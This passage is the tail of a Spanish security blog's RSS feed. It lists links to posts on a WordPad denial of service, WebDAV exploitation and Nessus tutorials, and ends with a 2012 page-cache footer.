href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li><li><a
href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 17/58 queries in 0.066 seconds using disk: basic
Object Caching 1873/1935 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 21:05:59 -->
